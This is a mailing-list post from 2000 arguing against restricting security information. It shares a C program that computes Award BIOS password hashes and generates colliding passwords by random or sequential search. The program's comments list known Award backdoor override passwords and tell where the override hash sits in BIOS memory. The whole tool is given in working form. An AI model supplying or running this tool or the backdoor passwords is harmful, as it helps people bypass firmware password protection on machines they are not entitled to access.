From: Robert A. Seace [ras@SLARTIBARTFAST.MAGRATHEA.COM] Sent: Thursday, April 06, 2000 2:36 PM To: VULN-DEV@SECURITYFOCUS.COM Subject: Award BIOS passwords (was Re: local security workaround through IE) In the profound words of Mr Jason C Hill: > > There is of course the backdoor passwords for the BIOS too. Older Award BIOS' > have two that i know of! > [snip...] > > Send me a personal mail if you'd like the Award BIOS backdoors - i'm only going > to mail them to worthy persons (dependant on your requirements and source email > address) to save people like me (College sys admins) the trouble caused by > kiddies messing up workstations. Well, thankfully not everyone else shares your strange view that information is somehow "dangerous", and should be restricted only to those deemed "worthy"... Trying to restrict information is merely another form of "security through obscurity"; and, hopefully everyone on this list has enough of a brain to realize that such an approach simply does NOT work... For the "unworthy" masses, below is an old program I picked up somewhere, but can't for the life of me remember WHERE now (or, I'd just provide an URL)... It's able to figure out Award BIOS passwords based on hashes... It also mentions a few of the common backdoor passwords found on many Award BIOSes... It ain't mine, so heap all praise/criticism on the author, not me, please... -- ||========================================================================|| || Robert A. Seace || URL || ras@magrathea.com || || AKA: Agrajag || http://www.magrathea.com/~ras/ || rob@wordstock.com || ||========================================================================|| "You just come along with me and have a good time. The Galaxy's a fun place. You'll need to have this fish in your ear." "I beg your pardon?" 
- THGTTG
************************************ Cut Here *******************************
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/*
 * NAME
 *
 *     awardpw -- Award BIOS Password generator and hash calculator
 *
 * SYNOPSIS
 *
 *     awardpw
 *     awardpw password1 [password2...]
 *     awardpw {-r | -s} [-t target] [-l length] [-i randseed]
 *
 * DESCRIPTION
 *
 *     Without arguments, awardpw prints a usage message. Given a list
 *     of passwords, it calculates the Award BIOS hash for each
 *     password. Given option -r, it generates random, alphanumeric
 *     (digits and upper and lower case) passwords of the given length,
 *     matching the target hash. Given option -s, it generates the
 *     sequence of all printable passwords of given length and target
 *     hash.
 *
 *     The default target is 0x1eaa, a common hash for the Award
 *     "override" password. The default length is 4.
 *
 * NOTES
 *
 *     The "intended" override password for hash 0x1eaa was probably
 *     "AWARD_SW", though "j262", "Syxz", and others have been
 *     offered. Someone reported "aLLy" (hash 0x1ea9) working for
 *     later versions of the Award BIOS, where the old passwords didn't
 *     work. "AWARD_SV" has hash 0x1ea9, too.
 *
 *     On my Award BIOS (f000:fff5 date "03/10/95"), the password
 *     checking code uses the word at f000:ec60 for the override hash.
 *     If you have an OEM version of Award that doesn't respond to the
 *     "usual" overrides, you might want to check that word to see if
 *     a different override hash is sitting there.
 *
 *     Some combinations of arguments will generate plenty of
 *     passwords, some will generate none. For example, there are no
 *     5-character plaintext passwords for the 0x1eaa hash, but
 *     4-character and 6-character passwords are plentiful. This is
 *     just an artifact of the hashing algorithm used.
 *
 * AUTHOR
 *
 *     Kevin Buhr
 */

/*
 * the hashing algorithm: accumulate characters in a 16-bit register
 * with a 2-bit left rotate before each add.
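*/

/* Longest password any routine in this file will build or enumerate. */
enum { MAX_PW_LEN = 8 };

/*
 * Compute the 16-bit hash of a NUL-terminated password.
 *
 * For every character the accumulator is rotated left by two bits within
 * 16 bits and the character is then added.  Returns a value in 0..0xffff.
 *
 * Review note: the result is only 16 bits wide and the mixing is a plain
 * rotate-and-add, so many different strings map to the same value (the
 * header comment of this file lists several for one hash).  A setup
 * password verified against such a hash should not be relied on as a
 * security boundary.
 */
int eval_pw(const char *pw)
{
    unsigned int accum = 0;

    while (*pw) {
        accum = ((accum << 2) | (accum >> 14)) & 0xffff;
        /*
         * Add the character as an unsigned byte so the result does not
         * depend on whether plain char is signed on the build platform.
         */
        accum += (unsigned char)*pw++;
        accum &= 0xffff;
    }
    return (int)accum;
}

/*
 * Write n random alphanumeric characters (0-9, A-Z, a-z) to pw.
 *
 * At most MAX_PW_LEN characters are written and no NUL terminator is
 * added; the caller terminates the buffer.  Nothing is written when
 * n <= 0.
 *
 * Each rand() value supplies up to four base-62 digits.
 * NOTE(review): the C standard only guarantees RAND_MAX >= 32767; on such
 * a platform the later digits taken from one rand() value are not
 * uniformly distributed.
 */
void rand_pw(int n, char *pw)
{
    /* Index 0..61 maps onto exactly the 62 alphanumeric characters. */
    static const char alphabet[] =
        "0123456789"
        "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
        "abcdefghijklmnopqrstuvwxyz";
    int i, j;

    if (n <= 0)
        return;

    for (i = 0; i < 2; ++i) {
        unsigned int r = (unsigned int)rand();

        for (j = 0; j < 4; ++j) {
            *pw++ = alphabet[r % 62];
            if (--n <= 0)
                return;
            r /= 62;
        }
    }
}

/*
 * Step pw to the next string over the printable ASCII range ' '..'~',
 * with pw[0] as the fastest-changing position.
 *
 * Returns non-zero while another candidate was produced, and 0 once every
 * position has wrapped back to ' ' (the sequence is exhausted).
 */
int inc_pw(char *pw)
{
    /* Carry: every position already at '~' wraps to ' '. */
    while (*pw == '~') {
        *pw++ = ' ';
    }
    if (*pw)
        ++*pw;
    return *pw;
}

/* Program name used in usage and error messages; set by main(). */
char *argv0;

/* Print the usage text to stderr. */
void show_syntax(void)
{
    fprintf(stderr,
            "awardpw -- calculate Award BIOS password hashes\n"
            " (by Kevin Buhr )\n");
    fprintf(stderr,
            "syntax:\n"
            "\t%s password1 [password2...]\n"
            "\t%s {-r | -s} [-t target] [-l length] [-i randseed]\n",
            argv0, argv0);
}

/* Map a requested length onto 1..MAX_PW_LEN; anything else becomes MAX_PW_LEN. */
static int clamp_length(int n)
{
    return (n <= 0 || n > MAX_PW_LEN) ? MAX_PW_LEN : n;
}

/*
 * Parse text as a complete integer in the given base.
 * Returns 1 and stores the value in *out on success, 0 when text is empty
 * or has trailing characters.
 */
static int parse_number(const char *text, int base, long *out)
{
    char *end;
    long v = strtol(text, &end, base);

    if (end == text || *end != '\0')
        return 0;
    *out = v;
    return 1;
}

/*
 * Print every randomly generated n-character string whose hash equals
 * target.  This function never returns; it runs until the process is
 * interrupted.
 */
void try_random(int n, unsigned int target)
{
    char pw[MAX_PW_LEN + 1];

    /* Clamp first so that pw[n] can never index outside the buffer. */
    n = clamp_length(n);
    pw[n] = '\0';
    fprintf(stderr, "target = 0x%04x\n", target);
    while (1) {
        rand_pw(n, pw);
        if ((unsigned int)eval_pw(pw) == target) {
            printf("%s\n", pw);
        }
    }
}

/*
 * Walk all n-character printable strings in inc_pw() order and print the
 * ones whose hash equals target.
 */
void try_sequence(int n, unsigned int target)
{
    /*
     * Sized for the longest password plus the terminator, so the write
     * to pw[n] below is always in bounds.
     */
    char pw[MAX_PW_LEN + 1];
    int i;

    n = clamp_length(n);
    for (i = 0; i < n; ++i)
        pw[i] = ' ';
    pw[n] = '\0';
    fprintf(stderr, "target = 0x%04x\n", target);
    do {
        if ((unsigned int)eval_pw(pw) == target) {
            printf("%s\n", pw);
        }
    } while (inc_pw(pw));
}

/*
 * Entry point: parse the options, then either run one of the two search
 * modes or print the hash of each password given on the command line.
 * Returns 0 on success and 1 on a usage error.
 */
int main(int argc, char **argv)
{
    int opt;
    int length = 4;
    unsigned int target = 0x1eaa;
    unsigned int seed = 0;
    long value;
    enum { NONE, RANDOM, SEQUENCE } mode = NONE;

    argv0 = (argc > 0 && argv[0]) ? argv[0] : "awardpw";

    /* getopt() signals the end of the options with -1. */
    while ((opt = getopt(argc, argv, "hrsl:t:i:")) != -1) {
        switch (opt) {
        case 'h':
            show_syntax();
            return 0;
        case 'l':
            if (!parse_number(optarg, 10, &value)) {
                fprintf(stderr, "%s: invalid length '%s'\n", argv0, optarg);
                return 1;
            }
            /* Out-of-range lengths fall back to the maximum. */
            length = (value < 1 || value > MAX_PW_LEN) ? MAX_PW_LEN
                                                       : (int)value;
            break;
        case 't':
            /*
             * eval_pw() never returns more than 0xffff, so a larger
             * target could never match and -r would spin without output.
             */
            if (!parse_number(optarg, 0, &value) ||
                value < 0 || value > 0xffff) {
                fprintf(stderr, "%s: target must be in 0..0xffff, got '%s'\n",
                        argv0, optarg);
                return 1;
            }
            target = (unsigned int)value;
            break;
        case 'i':
            if (!parse_number(optarg, 10, &value)) {
                fprintf(stderr, "%s: invalid seed '%s'\n", argv0, optarg);
                return 1;
            }
            seed = (unsigned int)value;
            break;
        case 'r':
            mode = RANDOM;
            break;
        case 's':
            mode = SEQUENCE;
            break;
        default:
            show_syntax();
            return 1;
        }
    }

    srand(seed);

    switch (mode) {
    case RANDOM:
        try_random(length, target);
        break;
    case SEQUENCE:
        try_sequence(length, target);
        break;
    default:
        if (!argv[optind]) {
            show_syntax();
        } else {
            while (argv[optind]) {
                printf("%s => %04x\n", argv[optind],
                       (unsigned int)eval_pw(argv[optind]));
                ++optind;
            }
        }
        break;
    }
    return 0;
}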